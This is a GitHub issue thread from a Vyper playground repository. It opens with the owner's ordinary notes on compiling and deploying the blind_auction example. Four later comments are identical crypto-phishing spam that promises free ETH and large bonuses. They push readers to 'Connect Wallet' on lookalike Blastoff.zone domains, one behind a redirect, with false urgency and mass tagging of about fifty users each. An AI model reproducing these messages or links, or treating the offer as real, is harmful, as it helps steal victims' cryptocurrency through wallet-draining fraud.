### ISSUE TITLE
Compile examples from Vyper github

### ISSUE THREAD

**Issue by mariustache** [mariustache/vyper-playground#2]
Official repository for Vyper language: https://github.com/vyperlang/vyper
Use Dockerfile to generate the image, then run a container to compile some contracts from **examples**.

**Comment by mariustache** [comment]
Managed to compile and deploy **blind_auction** example on a testnet, using Remix IDE.

**Comment by SDH-IT-HO** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
sectore, @pentcle, @MoAtefAmer, @mcbucks, @piltrisur, @lucasfloriani, @xuman2019, @deviou5, @marciob, @marcvernet31, @Howl1935, @shellhue, @MehdizadeMilad, @2020-io, @pablo-lamtenzan, @Manflack, @terrytjw, @dselmanovic, @alangshur, @heba-elhasn, @zTgx, @meehow, @mskobe, @zhaochunqi, @FrankYang0529, @zlexdl, @gndelia, @EhsanRahbari, @h0ngcha0, @pkosior, @sabrinekhoualdi, @SeeYangZhi, @yashvadhvani, @jasonzhouu, @binc4t, @BenSparksCode, @liberuum, @nisansalq, @iayanami, @esarbanis, @miilord, @Atrolantra, @jagadishkamathk, @kohasummons, @Milad404airdrop, @EsoPesco, @DPS0340, @natewill, @krisidmisso, @okwme

**Comment by SDH-IT-HO** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
buikhacnam, @kylezervas, @NargusS, @laurivers, @juliankohlman, @masaya-sasaki, @gheorghitahurmuz, @DeRain, @luminary, @forthxu, @proghax333, @GoatsefaceKilla, @mazgalesc, @meshalsaud, @wavinginspace, @kamapcrazy, @samburgers, @Npizza, @wilburnn, @exhoty, @vakond, @piesrtasty, @samir-acle, @nathgilson, @huseyinsoyluu, @payomdousti, @mlopezlaguardia, @ErichDylus, @JunTurbo, @muzafferkadir, @wyattowalsh, @dibashthapa, @fraktar, @Platinumwrist, @embatron, @shisukeUrahara, @stiucsib86, @Urbistondo, @manesiotise, @tboydar, @gaobirou, @mukwevhom, @CleverOscar, @Barabazs, @hydraMagic, @teddywilson, @evanSpendlove, @hschen2k, @ragecryx, @blockchainian

**Comment by jguzej** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
WraithWinterly, @Omb77, @zheng100, @manuelramirezio, @doggeddog, @G-Verse, @YanhuiJessica, @aug2uag, @Bonnai2112, @ipqhjjybj, @hemachandraMS, @adi-li, @noncreativefolk, @devolasvegas, @aiterahai, @ncitron, @KingDavid9991, @sosnovsky, @Maxencio50, @somewhereocean, @Rami-Majdoub, @TANAWATTHITIWIT, @seonicklaus, @HetaHub, @milkteawu, @dastagirkhan, @jpcloureiro, @khaled131, @arcsin4, @KirisakiAria, @rgurov, @sean-ocallahan, @omondragon, @thundb, @shyuan, @ArchMa9e, @carter-ya, @sonm-usui, @Ad900367, @thekoenekamp, @afrideva, @he9lin, @wufannet, @Goodday1212, @a526757124, @adeubank, @erickwang108, @0xdevant, @Tobi-Adegbuji, @hrutik016

**Comment by masa2el** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](http://bibleglot.com/%5Cconnect.blastofflzone.com/referral)

# Blastoff.zone: Claim Your Share of 1 Million Tokens and $500,000!

Congratulations! You've just unlocked an exclusive opportunity to claim your share of 1 million tokens and a staggering $500,000 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](http://bibleglot.com/%5Cconnect.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500,000 bonus.
3. Use the "Claim Now" option to secure your tokens and cash in on the rewards.

This offer is limited and won't be available for long, so act now to maximize your gains!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 1 million tokens already claimed, seize this incredible opportunity before it's too late!
terorie, @Ahmed-Farrag, @MilleniumSpark, @0xVitae, @AgusVargas, @elizaday, @gkimbwala, @bombbelt, @vitty13, @robertu7, @Sean-Snow, @quantumsheep, @saffmash43, @Krow10, @james-c, @lingcoder, @atimur, @AliWisam, @0x-ufuk, @artivilla, @icebergyy, @javier-tarazaga, @AbelTedros, @pvela, @kohasummons, @furmanOFF, @Frainlar, @eddyiskongz, @kvadlamani92, @ocdbytes, @RonSherfey, @enrutador, @xxxx-oooo, @lcg2015, @Demand03787, @wdjyi, @sieg-i, @AlexiaChen, @arianhaddadi, @GrandGarcon, @kovamirani, @Fierce2869, @motxx, @ukhack, @Beks11, @Frany-oss, @fengjian, @29jitender, @Naeil22, @achab
